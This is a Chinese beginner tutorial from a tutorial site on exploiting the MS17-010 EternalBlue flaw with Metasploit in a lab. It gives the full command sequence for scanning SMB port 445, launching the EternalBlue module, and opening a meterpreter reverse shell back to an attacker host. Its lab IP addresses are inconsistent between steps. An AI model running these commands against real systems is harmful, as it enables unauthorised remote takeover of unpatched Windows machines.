小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHEL
《小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析》要点: 攻击机:192.168.11.231 被攻击机:192.168.11.22 第一步:更新MSF:msfupdate,查找smb_ms17_010.rb模块 cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb 第二步:连接postgresql数据库,不连接的话扫描的信息的信息无法入库.连接上后可通过db_status查看状态 启动数据库:service postgresql start 启动msfconsole:msfconsole 使用db_status确认数据库是否正确连接 第三步:运行smb模块探测主机445端口开放情况. use auxiliary/scanner/smb/smb_version set rhosts 192.168.236.129/24 set threads 16 run 扫描完成后,扫描的信息会自动存入数据库,可通过hosts命令查看 第四步:使用smb_ms17_010模块探测MS17-010漏洞 use auxiliary/scanner/smb/smb_ms17_010 show options set threads 16 services -r tcp -p 445 -R run 扫描之前可通过info查看配置详情 第五步:使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue 设置目标系统的IP和payload. set RHOST 192.168.142.128 set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.142.133 exploit执行攻击,胜利返回会话. 第六步:坐等结果 meterpreter> sysinfo meterpreter> getuid MS17-010扫描模块截图 MS17-010攻击模块截图 攻击胜利,得到SHELL!!! 欢迎参与《小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析》讨论,分享您的想法,编程之家PHP学院为您提供专业教程。 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |